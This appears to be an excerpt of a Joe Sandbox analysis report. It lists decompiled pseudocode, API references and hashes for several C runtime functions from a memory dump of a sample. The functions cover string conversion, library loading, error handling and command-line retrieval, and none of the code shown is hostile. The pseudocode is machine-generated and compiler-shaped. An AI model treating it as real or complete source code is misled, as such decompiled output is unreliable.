                                                                                            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                            				signed int _v8;
                                                                                            				int _v12;
                                                                                            				char _v16;
                                                                                            				intOrPtr _v24;
                                                                                            				char _v28;
                                                                                            				void* _v40;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				signed int _t34;
                                                                                            				signed int _t40;
                                                                                            				int _t45;
                                                                                            				int _t52;
                                                                                            				void* _t53;
                                                                                            				void* _t55;
                                                                                            				int _t57;
                                                                                            				signed int _t63;
                                                                                            				int _t67;
                                                                                            				short* _t71;
                                                                                            				signed int _t72;
                                                                                            				short* _t73;
                                                                                            
                                                                                            				_t34 =  *0x412014; // 0x471e291c
                                                                                            				_v8 = _t34 ^ _t72;
                                                                                            				_push(_t53);
                                                                                            				E00403F2B(_t53,  &_v28, __edx, _a4);
                                                                                            				_t57 = _a24;
                                                                                            				if(_t57 == 0) {
                                                                                            					_t52 =  *(_v24 + 8);
                                                                                            					_t57 = _t52;
                                                                                            					_a24 = _t52;
                                                                                            				}
                                                                                            				_t67 = 0;
                                                                                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                            				_v12 = _t40;
                                                                                            				if(_t40 == 0) {
                                                                                            					L15:
                                                                                            					if(_v16 != 0) {
                                                                                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                            					}
                                                                                            					E004018CC();
                                                                                            					return _t67;
                                                                                            				}
                                                                                            				_t55 = _t40 + _t40;
                                                                                            				_t17 = _t55 + 8; // 0x8
                                                                                            				asm("sbb eax, eax");
                                                                                            				if((_t17 & _t40) == 0) {
                                                                                            					_t71 = 0;
                                                                                            					L11:
                                                                                            					if(_t71 != 0) {
                                                                                            						E00402460(_t67, _t71, _t67, _t55);
                                                                                            						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                                                                                            						if(_t45 != 0) {
                                                                                            							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                                                                                            						}
                                                                                            					}
                                                                                            					L14:
                                                                                            					E004063D5(_t71);
                                                                                            					goto L15;
                                                                                            				}
                                                                                            				_t20 = _t55 + 8; // 0x8
                                                                                            				asm("sbb eax, eax");
                                                                                            				_t47 = _t40 & _t20;
                                                                                            				_t21 = _t55 + 8; // 0x8
                                                                                            				_t63 = _t21;
                                                                                            				if((_t40 & _t20) > 0x400) {
                                                                                            					asm("sbb eax, eax");
                                                                                            					_t71 = E00403E3D(_t63, _t47 & _t63);
                                                                                            					if(_t71 == 0) {
                                                                                            						goto L14;
                                                                                            					}
                                                                                            					 *_t71 = 0xdddd;
                                                                                            					L9:
                                                                                            					_t71 =  &(_t71[4]);
                                                                                            					goto L11;
                                                                                            				}
                                                                                            				asm("sbb eax, eax");
                                                                                            				E004018E0();
                                                                                            				_t71 = _t73;
                                                                                            				if(_t71 == 0) {
                                                                                            					goto L14;
                                                                                            				}
                                                                                            				 *_t71 = 0xcccc;
                                                                                            				goto L9;
                                                                                            			}























                                                                                            0x004062c0
                                                                                            0x004062c7
                                                                                            0x004062ca
                                                                                            0x004062d3
                                                                                            0x004062d8
                                                                                            0x004062dd
                                                                                            0x004062e2
                                                                                            0x004062e5
                                                                                            0x004062e7
                                                                                            0x004062e7
                                                                                            0x004062ec
                                                                                            0x00406305
                                                                                            0x0040630b
                                                                                            0x00406310
                                                                                            0x004063af
                                                                                            0x004063b3
                                                                                            0x004063b8
                                                                                            0x004063b8
                                                                                            0x004063cc
                                                                                            0x004063d4
                                                                                            0x004063d4
                                                                                            0x00406316
                                                                                            0x00406319
                                                                                            0x0040631e
                                                                                            0x00406322
                                                                                            0x0040636e
                                                                                            0x00406370
                                                                                            0x00406372
                                                                                            0x00406377
                                                                                            0x0040638e
                                                                                            0x00406396
                                                                                            0x004063a6
                                                                                            0x004063a6
                                                                                            0x00406396
                                                                                            0x004063a8
                                                                                            0x004063a9
                                                                                            0x00000000
                                                                                            0x004063ae
                                                                                            0x00406324
                                                                                            0x00406329
                                                                                            0x0040632b
                                                                                            0x0040632d
                                                                                            0x0040632d
                                                                                            0x00406335
                                                                                            0x00406352
                                                                                            0x0040635c
                                                                                            0x00406361
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406363
                                                                                            0x00406369
                                                                                            0x00406369
                                                                                            0x00000000
                                                                                            0x00406369
                                                                                            0x00406339
                                                                                            0x0040633d
                                                                                            0x00406342
                                                                                            0x00406346
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406348
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                                            • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                                            • __freea.LIBCMT ref: 004063A9
                                                                                              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                            • String ID:
                                                                                            • API String ID: 313313983-0
                                                                                            • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                                                            • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 95%
                                                                                            			E00405751(signed int _a4) {
                                                                                            				signed int _t9;
                                                                                            				void* _t13;
                                                                                            				signed int _t15;
                                                                                            				WCHAR* _t22;
                                                                                            				signed int _t24;
                                                                                            				signed int* _t25;
                                                                                            				void* _t27;
                                                                                            
                                                                                            				_t9 = _a4;
                                                                                            				_t25 = 0x412fc8 + _t9 * 4;
                                                                                            				_t24 =  *_t25;
                                                                                            				if(_t24 == 0) {
                                                                                            					_t22 =  *(0x40cd48 + _t9 * 4);
                                                                                            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                            					if(_t27 != 0) {
                                                                                            						L8:
                                                                                            						 *_t25 = _t27;
                                                                                            						if( *_t25 != 0) {
                                                                                            							FreeLibrary(_t27);
                                                                                            						}
                                                                                            						_t13 = _t27;
                                                                                            						L11:
                                                                                            						return _t13;
                                                                                            					}
                                                                                            					_t15 = GetLastError();
                                                                                            					if(_t15 != 0x57) {
                                                                                            						_t27 = 0;
                                                                                            					} else {
                                                                                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                            						_t27 = _t15;
                                                                                            					}
                                                                                            					if(_t27 != 0) {
                                                                                            						goto L8;
                                                                                            					} else {
                                                                                            						 *_t25 = _t15 | 0xffffffff;
                                                                                            						_t13 = 0;
                                                                                            						goto L11;
                                                                                            					}
                                                                                            				}
                                                                                            				_t4 = _t24 + 1; // 0x471e291d
                                                                                            				asm("sbb eax, eax");
                                                                                            				return  ~_t4 & _t24;
                                                                                            			}










                                                                                            0x00405756
                                                                                            0x0040575a
                                                                                            0x00405761
                                                                                            0x00405765
                                                                                            0x00405773
                                                                                            0x00405789
                                                                                            0x0040578d
                                                                                            0x004057b6
                                                                                            0x004057b8
                                                                                            0x004057bc
                                                                                            0x004057bf
                                                                                            0x004057bf
                                                                                            0x004057c5
                                                                                            0x004057c7
                                                                                            0x00000000
                                                                                            0x004057c8
                                                                                            0x0040578f
                                                                                            0x00405798
                                                                                            0x004057a7
                                                                                            0x0040579a
                                                                                            0x0040579d
                                                                                            0x004057a3
                                                                                            0x004057a3
                                                                                            0x004057ab
                                                                                            0x00000000
                                                                                            0x004057ad
                                                                                            0x004057b0
                                                                                            0x004057b2
                                                                                            0x00000000
                                                                                            0x004057b2
                                                                                            0x004057ab
                                                                                            0x00405767
                                                                                            0x0040576c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                                            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                                                            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 71%
                                                                                            			E00404320(void* __ebx, void* __ecx, void* __edx) {
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				intOrPtr _t2;
                                                                                            				void* _t3;
                                                                                            				void* _t4;
                                                                                            				intOrPtr _t9;
                                                                                            				void* _t11;
                                                                                            				void* _t20;
                                                                                            				void* _t21;
                                                                                            				void* _t23;
                                                                                            				void* _t25;
                                                                                            				void* _t27;
                                                                                            				void* _t29;
                                                                                            				void* _t31;
                                                                                            				void* _t32;
                                                                                            				long _t36;
                                                                                            				long _t37;
                                                                                            				void* _t40;
                                                                                            
                                                                                            				_t29 = __edx;
                                                                                            				_t23 = __ecx;
                                                                                            				_t20 = __ebx;
                                                                                            				_t36 = GetLastError();
                                                                                            				_t2 =  *0x412064; // 0x7
                                                                                            				_t42 = _t2 - 0xffffffff;
                                                                                            				if(_t2 == 0xffffffff) {
                                                                                            					L2:
                                                                                            					_t3 = E00403ECE(_t23, 1, 0x364);
                                                                                            					_t31 = _t3;
                                                                                            					_pop(_t25);
                                                                                            					if(_t31 != 0) {
                                                                                            						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                                                                                            						__eflags = _t4;
                                                                                            						if(_t4 != 0) {
                                                                                            							E00404192(_t25, _t31, 0x4132a4);
                                                                                            							E00403E03(0);
                                                                                            							_t40 = _t40 + 0xc;
                                                                                            							__eflags = _t31;
                                                                                            							if(_t31 == 0) {
                                                                                            								goto L9;
                                                                                            							} else {
                                                                                            								goto L8;
                                                                                            							}
                                                                                            						} else {
                                                                                            							_push(_t31);
                                                                                            							goto L4;
                                                                                            						}
                                                                                            					} else {
                                                                                            						_push(_t3);
                                                                                            						L4:
                                                                                            						E00403E03();
                                                                                            						_pop(_t25);
                                                                                            						L9:
                                                                                            						SetLastError(_t36);
                                                                                            						E00403E8B(_t20, _t29, _t31, _t36);
                                                                                            						asm("int3");
                                                                                            						_push(_t20);
                                                                                            						_push(_t36);
                                                                                            						_push(_t31);
                                                                                            						_t37 = GetLastError();
                                                                                            						_t21 = 0;
                                                                                            						_t9 =  *0x412064; // 0x7
                                                                                            						_t45 = _t9 - 0xffffffff;
                                                                                            						if(_t9 == 0xffffffff) {
                                                                                            							L12:
                                                                                            							_t32 = E00403ECE(_t25, 1, 0x364);
                                                                                            							_pop(_t27);
                                                                                            							if(_t32 != 0) {
                                                                                            								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                                                                                            								__eflags = _t11;
                                                                                            								if(_t11 != 0) {
                                                                                            									E00404192(_t27, _t32, 0x4132a4);
                                                                                            									E00403E03(_t21);
                                                                                            									__eflags = _t32;
                                                                                            									if(_t32 != 0) {
                                                                                            										goto L19;
                                                                                            									} else {
                                                                                            										goto L18;
                                                                                            									}
                                                                                            								} else {
                                                                                            									_push(_t32);
                                                                                            									goto L14;
                                                                                            								}
                                                                                            							} else {
                                                                                            								_push(_t21);
                                                                                            								L14:
                                                                                            								E00403E03();
                                                                                            								L18:
                                                                                            								SetLastError(_t37);
                                                                                            							}
                                                                                            						} else {
                                                                                            							_t32 = E00405878(_t25, _t45, _t9);
                                                                                            							if(_t32 != 0) {
                                                                                            								L19:
                                                                                            								SetLastError(_t37);
                                                                                            								_t21 = _t32;
                                                                                            							} else {
                                                                                            								goto L12;
                                                                                            							}
                                                                                            						}
                                                                                            						return _t21;
                                                                                            					}
                                                                                            				} else {
                                                                                            					_t31 = E00405878(_t23, _t42, _t2);
                                                                                            					if(_t31 != 0) {
                                                                                            						L8:
                                                                                            						SetLastError(_t36);
                                                                                            						return _t31;
                                                                                            					} else {
                                                                                            						goto L2;
                                                                                            					}
                                                                                            				}
                                                                                            			}





















                                                                                            0x00404320
                                                                                            0x00404320
                                                                                            0x00404320
                                                                                            0x0040432a
                                                                                            0x0040432c
                                                                                            0x00404331
                                                                                            0x00404334
                                                                                            0x00404342
                                                                                            0x00404349
                                                                                            0x0040434e
                                                                                            0x00404351
                                                                                            0x00404354
                                                                                            0x00404366
                                                                                            0x0040436b
                                                                                            0x0040436d
                                                                                            0x00404378
                                                                                            0x0040437f
                                                                                            0x00404384
                                                                                            0x00404387
                                                                                            0x00404389
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040436f
                                                                                            0x0040436f
                                                                                            0x00000000
                                                                                            0x0040436f
                                                                                            0x00404356
                                                                                            0x00404356
                                                                                            0x00404357
                                                                                            0x00404357
                                                                                            0x0040435c
                                                                                            0x00404397
                                                                                            0x00404398
                                                                                            0x0040439e
                                                                                            0x004043a3
                                                                                            0x004043a6
                                                                                            0x004043a7
                                                                                            0x004043a8
                                                                                            0x004043af
                                                                                            0x004043b1
                                                                                            0x004043b3
                                                                                            0x004043b8
                                                                                            0x004043bb
                                                                                            0x004043c9
                                                                                            0x004043d5
                                                                                            0x004043d8
                                                                                            0x004043db
                                                                                            0x004043ed
                                                                                            0x004043f2
                                                                                            0x004043f4
                                                                                            0x004043ff
                                                                                            0x00404405
                                                                                            0x0040440d
                                                                                            0x0040440f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004043f6
                                                                                            0x004043f6
                                                                                            0x00000000
                                                                                            0x004043f6
                                                                                            0x004043dd
                                                                                            0x004043dd
                                                                                            0x004043de
                                                                                            0x004043de
                                                                                            0x00404411
                                                                                            0x00404412
                                                                                            0x00404412
                                                                                            0x004043bd
                                                                                            0x004043c3
                                                                                            0x004043c7
                                                                                            0x0040441a
                                                                                            0x0040441b
                                                                                            0x00404421
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004043c7
                                                                                            0x00404428
                                                                                            0x00404428
                                                                                            0x00404336
                                                                                            0x0040433c
                                                                                            0x00404340
                                                                                            0x0040438b
                                                                                            0x0040438c
                                                                                            0x00404396
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404340

                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                                            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                                            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                                            • _abort.LIBCMT ref: 0040439E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 88804580-0
                                                                                            • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                                            • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004025BA() {
                                                                                            				void* _t4;
                                                                                            				void* _t8;
                                                                                            
                                                                                            				E00402AE5();
                                                                                            				E00402A79();
                                                                                            				if(E004027D9() != 0) {
                                                                                            					_t4 = E0040278B(_t8, __eflags);
                                                                                            					__eflags = _t4;
                                                                                            					if(_t4 != 0) {
                                                                                            						return 1;
                                                                                            					} else {
                                                                                            						E00402815();
                                                                                            						goto L1;
                                                                                            					}
                                                                                            				} else {
                                                                                            					L1:
                                                                                            					return 0;
                                                                                            				}
                                                                                            			}





                                                                                            0x004025ba
                                                                                            0x004025bf
                                                                                            0x004025cb
                                                                                            0x004025d0
                                                                                            0x004025d5
                                                                                            0x004025d7
                                                                                            0x004025e2
                                                                                            0x004025d9
                                                                                            0x004025d9
                                                                                            0x00000000
                                                                                            0x004025d9
                                                                                            0x004025cd
                                                                                            0x004025cd
                                                                                            0x004025cf
                                                                                            0x004025cf

                                                                                            APIs
                                                                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                                              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                            • String ID:
                                                                                            • API String ID: 1761009282-0
                                                                                            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                                            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00405575() {
                                                                                            
                                                                                            				 *0x412e78 = GetCommandLineA();
                                                                                            				 *0x412e7c = GetCommandLineW();
                                                                                            				return 1;
                                                                                            			}



                                                                                            0x0040557b
                                                                                            0x00405586
                                                                                            0x0040558d

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CommandLine
                                                                                            • String ID: `3Q
                                                                                            • API String ID: 3253501508-1603343968
                                                                                            • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                                                                            • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                                                                                            • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                                                                            • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%